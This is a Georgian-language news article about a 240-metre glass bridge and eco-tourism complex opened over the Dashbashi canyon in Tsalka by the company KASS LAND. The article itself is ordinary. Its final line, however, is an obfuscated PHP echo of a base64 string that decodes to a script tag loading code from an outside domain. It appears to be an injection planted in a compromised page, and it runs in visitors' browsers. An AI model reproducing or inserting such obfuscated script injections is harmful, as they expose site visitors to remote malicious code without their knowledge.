celsiusi
ავერსი შნაიდერი
ქვემო ქართლში, წალკის მუნიციპალიტეტში​, დაშბაშის კანიონზე 240-მეტრიანი შუშის ხიდი გაიხსნა.
 
კანიონზე მრავალფეროვანი ეკოტურისტული სივრცის მოწყობის სამუშაოები ისრაელის კომპანია KASS LAND-მა განახორციელა. რომელმაც, 120 მილიონი ლარის ინვესტიცია ჩადო და შექმნა 250 სამუშაო ადგილი. მდინარე ხრამის ხეობაში მდებარე წალკის (დაშბაშის) კანიონზე არსებული ტურისტული კომპლექსი ვიზიტორებს 15 ივნისიდან უმასპინძლებს.
 
როგორც წალკის კანიონის პანორამული ხიდის გახსნაზე ისრაელის კომპანია „კასს ლენდის“ გენერალურმა დირექტორმა ეკატერინე თორდიამ განაცხადა წალკის კანიონის შუშის ხიდზე მდებარე კაფე-ბარი, ყველაზე მაღალი რესტორნის სტატუსით, გინესის რეკორდების წიგნში მოხვდება. 
 
მისივე თქმით, მრავალფეროვან ეკოტურისტულ სივრცეს, რომელიც განსხვავებულია ინფრასტრუქტურით, ნამდვილად შეიძლება ვუწოდოთ ქართული ტურიზმის ბრილიანტი.
 
„240-მეტრიანი შუშის ხიდი, რომლის შუაგულში დაკიდებულია შუშის კაფე-ბარი, უკვე დასრულებულია და ჩვენ გავდივართ პროცედურებს, რომელიც დასრულდება 2022 წლისთვის. ჩვენ ამ საოცარ ნაგებობას, ხიდზე დაკიდებულ ყველაზე მაღალი რესტორნის სტატუსით ვიხილავთ გინესის რეკორდების წიგნში.
 
აგრეთვე, მინდა გაცნობოთ, ეს არის ჩვენი ინვესტიციის მხოლოდ პირველი ნაწილი. ახლა კი ვაანონსებ რამდენიმე მილიონიანი ლარის ინვესტიციას, რომელიც განხორციელდება მიმდებარე ტერიტორიაზე და ჩვენ ვაპირებთ ევროპაში ერთ-ერთი ყველაზე დიდი და მასშტაბური აკვაპარკის მშენებლობას და დამატებით აშენდება 200 ვილა. რა თქმა უნდა, დიდი იმედი გვაქვს სახელმწიფოს მხარდაჭერის. ჩვენ მიზნად გვაქვს, რომ წალკა ვაქციოთ მსოფლიო ტურიზმის მიზიდულობის ცენტრად“, – განაცხადა კომპანია „კასს ლენდის“ წარმომადგენელმა. 
 
უნიკალური კომპლექსის დამთვალიერებლებს შთამბეჭდავი სანახაობა ელოდებათ – პანორამული გადასახედები, ლამაზი ხედები, კასკადურ ჩანჩქერებამდე მიმავალი ბილიკები, ვიზიტორებისთვის კოტეჯები, ხიდის შუაში 200 მეტრის სიმაღლეზე მოწყობილი ორიგინალური ფორმის კაფე.
 
 
753
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");